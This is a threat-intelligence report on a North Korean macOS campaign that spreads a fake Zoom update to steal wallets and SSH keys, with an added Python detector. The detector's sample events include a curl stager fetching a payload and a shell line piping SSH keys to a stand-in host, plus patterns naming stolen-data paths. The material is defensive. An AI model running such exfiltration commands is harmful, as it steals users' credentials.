North Korean Hackers Target macOS Users in Cryptocurrency Theft Campaign
Severity: High (Score: 75.5)
Sources: Gbhackers, Cybernews
Keywords: north, korean, macos, campaign, malware, uncovered, threat
Severity indicators: apt, north korean apt, malware
Summary
A sophisticated malware campaign targeting macOS users has been linked to the North Korean threat group Sapphire Sleet. The operation focuses on cryptocurrency organizations, venture capital firms, and Web3 developers. Attackers use social engineering to convince victims to download malware disguised as a legitimate Zoom update. Once installed, the malware runs a multi-stage infection chain that leverages trusted macOS components to evade security controls. It collects sensitive information, including cryptocurrency wallets and SSH keys, and sends it to North Korean-controlled servers. The campaign signals a shift toward trust abuse rather than traditional vulnerability exploitation. Researchers from LevelBlue's SpiderLabs attribute the activity to Sapphire Sleet based on familiar tactics and techniques. The campaign is ongoing, with significant implications for the affected sectors.
Key Points:
- North Korean group Sapphire Sleet targets macOS users in a new malware campaign.
- Attackers use social engineering to distribute malware disguised as a Zoom update.
- The malware collects sensitive data, including cryptocurrency wallets and SSH keys.
Detailed Analysis
**Impact**
The campaign targets macOS users within cryptocurrency organizations, venture capital firms, and Web3 developers. The attackers aim to steal cryptocurrency wallets, local browser extension data, Telegram session information, SSH keys, and unencrypted Apple Notes. The operation affects high-value financial and crypto sectors, with data exfiltrated to North Korean-controlled servers, potentially resulting in significant financial losses and operational disruption.
**Technical Details**
The attack uses social engineering to deliver malware disguised as a Zoom SDK update via Telegram, email, or professional networking platforms. The malware is driven by AppleScript and abuses native macOS applications, notably Finder and Script Editor (formerly AppleScript Editor), to bypass security prompts and establish persistence. No CVEs are exploited; the campaign relies on trust abuse and multi-stage payload downloads from command-and-control servers. Indicators of compromise include the fake application bundle systemupdate.app and communication with known North Korean C2 infrastructure.
**Recommended Response**
Educate users to verify software updates independently (for example, through the vendor's own in-app updater or official download site rather than a link sent to them) and to treat unsolicited requests to install updates as suspicious. Deploy detections for suspicious AppleScript and osascript executions, in particular scripts launched from unsigned application bundles or from user-writable locations such as Downloads, and monitor for unusual Finder activity and network connections to known C2 domains. Harden macOS security configurations to restrict script execution and enforce multi-factor authentication for sensitive accounts. Monitor for exfiltration attempts involving cryptocurrency wallets and SSH keys.
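The detection advice above (suspicious AppleScript executions, an update-named fake app bundle, and access to SSH keys, wallets, Telegram and Notes data) can be expressed as a few process-telemetry rules. The following is an added example written for this page; it is not code from LevelBlue, SpiderLabs or either source article. The event format, field names (`path`, `args`, `responsible`, `signer`), the hostname `update-host.example`, the wallet names used in the sensitive-path pattern, and all sample events are assumptions constructed for illustration; only `systemupdate.app`, `osascript`, Finder, Telegram, Apple Notes and SSH keys come from the article.

```python
import json
import os
import re
from typing import Iterator, List, NamedTuple

# Constructed sample telemetry (not from the article): one JSON object per line,
# loosely modelled on process-exec events an EDR or the macOS Endpoint Security
# framework reports. Field names, PIDs, paths and the hostname are assumptions.
SAMPLE_EVENTS = r"""
{"ts":"2026-06-01T09:12:03Z","event":"exec","pid":501,"ppid":1,"path":"/Applications/zoom.us.app/Contents/MacOS/zoom.us","args":["zoom.us"],"signer":"Developer ID Application: Zoom Video Communications, Inc.","responsible":"/Applications/zoom.us.app"}
{"ts":"2026-06-01T09:15:41Z","event":"exec","pid":702,"ppid":690,"path":"/usr/bin/osascript","args":["osascript","/Users/alice/Downloads/systemupdate.app/Contents/Resources/update.scpt"],"signer":null,"responsible":"/Users/alice/Downloads/systemupdate.app"}
{"ts":"2026-06-01T09:15:42Z","event":"exec","pid":703,"ppid":702,"path":"/usr/bin/curl","args":["curl","-fsSL","-o","/tmp/.u","https://update-host.example/stage2"],"signer":null,"responsible":"/Users/alice/Downloads/systemupdate.app"}
{"ts":"2026-06-01T09:15:44Z","event":"exec","pid":704,"ppid":702,"path":"/bin/sh","args":["sh","-c","cat ~/.ssh/id_* | base64 | curl -d @- https://update-host.example/x"],"signer":null,"responsible":"/Users/alice/Downloads/systemupdate.app"}
{"ts":"2026-06-01T10:02:10Z","event":"exec","pid":810,"ppid":1,"path":"/usr/bin/osascript","args":["osascript","-e","tell application \"Finder\" to empty trash"],"signer":null,"responsible":"/System/Library/CoreServices/Finder.app"}
"""

# Bundles under these prefixes are treated as vendor-installed; anything else
# (Downloads, /tmp, a DMG mount point, no responsible bundle at all) is suspect.
TRUSTED_BUNDLE_PREFIXES = ("/Applications/", "/System/")
# Heuristic for lures named like an updater, e.g. systemupdate.app from the article.
UPDATE_NAMED_BUNDLE = re.compile(r"(?i)update.*\.app$")
# Paths/apps the campaign is reported to harvest; wallet app names are assumptions.
SENSITIVE_ARTIFACT = re.compile(
    r"(?i)(\.ssh/|Group Containers/.*Notes|Telegram|Exodus|Electrum)"
)
# Living-off-the-land binaries that osascript should not normally be spawning.
LOLBINS = {"/usr/bin/curl", "/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/base64"}


class Finding(NamedTuple):
    pid: int
    rule: str
    detail: str


def parse_events(text: str) -> Iterator[dict]:
    """Yield one event dict per non-empty JSON line."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def analyze(events) -> List[Finding]:
    """Run the four rules over a stream of exec events, in arrival order."""
    by_pid: dict = {}
    findings: List[Finding] = []
    for ev in events:
        by_pid[ev["pid"]] = ev
        path = ev["path"]
        responsible = ev.get("responsible") or ""
        bundle = os.path.basename(responsible)
        cmdline = " ".join(ev.get("args", []))

        # Rule 1/2: AppleScript interpreter launched by an untrusted or update-named bundle.
        if path == "/usr/bin/osascript":
            if not responsible.startswith(TRUSTED_BUNDLE_PREFIXES):
                findings.append(Finding(ev["pid"], "osascript-untrusted-bundle", responsible or "<none>"))
            if UPDATE_NAMED_BUNDLE.search(bundle):
                findings.append(Finding(ev["pid"], "osascript-update-named-bundle", bundle))

        # Rule 3: osascript acting as a stager, spawning curl/sh/base64 (only works
        # if the parent's exec event was seen earlier in the stream).
        parent = by_pid.get(ev["ppid"])
        if parent is not None and parent["path"] == "/usr/bin/osascript" and path in LOLBINS:
            findings.append(Finding(ev["pid"], "osascript-spawned-lolbin", path))

        # Rule 4: command line touches SSH keys, Notes, Telegram or wallet data.
        if SENSITIVE_ARTIFACT.search(cmdline):
            findings.append(Finding(ev["pid"], "sensitive-artifact-access", cmdline))
    return findings


def suspicious_bundles(findings: List[Finding], events) -> List[str]:
    """Distinct responsible bundles behind any finding, for triage/blocking."""
    by_pid = {ev["pid"]: ev for ev in events}
    return sorted({by_pid[f.pid].get("responsible") or "<none>" for f in findings})


if __name__ == "__main__":
    results = analyze(parse_events(SAMPLE_EVENTS))
    for f in results:
        print(f"pid={f.pid} rule={f.rule} detail={f.detail}")
    print("bundles:", suspicious_bundles(results, parse_events(SAMPLE_EVENTS)))
```

In the constructed sample, the legitimate Zoom process and the Finder-hosted osascript call produce no findings, while the osascript launched from `~/Downloads/systemupdate.app` trips both bundle rules, its curl and sh children trip the stager rule, and the shell command that reads `~/.ssh/id_*` also trips the sensitive-artifact rule. Rule 3 depends on seeing the parent's exec event first, so feed the detector a chronologically ordered stream.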
Source articles (2)
- North Korean hackers target macOS users with advanced malware campaign — Cybernews · 2026-06-01
  Security researchers have uncovered a sophisticated macOS-focused malware campaign linked to the North Korean threat group Sapphire Sleet, also known as BlueNoroff or UNC1069. According to LevelBlue's…
- North Korean APT Targets macOS to Steal Crypto Wallets and SSH Keys — Gbhackers · 2026-06-03
  A newly uncovered macOS intrusion campaign attributed to the North Korean state- threat group Sapphire Sleet, also known as BlueNoroff or UNC1069, is targeting high-value organizations in the financia…
Timeline
- 2026-06-01 — Malware campaign revealed: LevelBlue's SpiderLabs reported a sophisticated macOS malware campaign linked to Sapphire Sleet targeting cryptocurrency organizations.
- 2026-06-03 — Ongoing threat confirmed: Gbhackers reported that the North Korean APT continues to target high-value organizations in the financial sector.
Related entities
- BlueNoroff (Apt Group)
- Sapphire Sleet (Apt Group)
- UNC1069 (Apt Group)
- Malware (Attack Type)
- Phishing (Attack Type)
- systemupdate.app (Application bundle)
- Financial (Industry)
- T1041 - Exfiltration Over C2 Channel (Mitre Attack)
- T1059.002 - AppleScript (Mitre Attack)
- T1071 - Application Layer Protocol (Mitre Attack)
- MacOS (Platform)
- AppleScript Editor (Tool)
- Finder (Tool)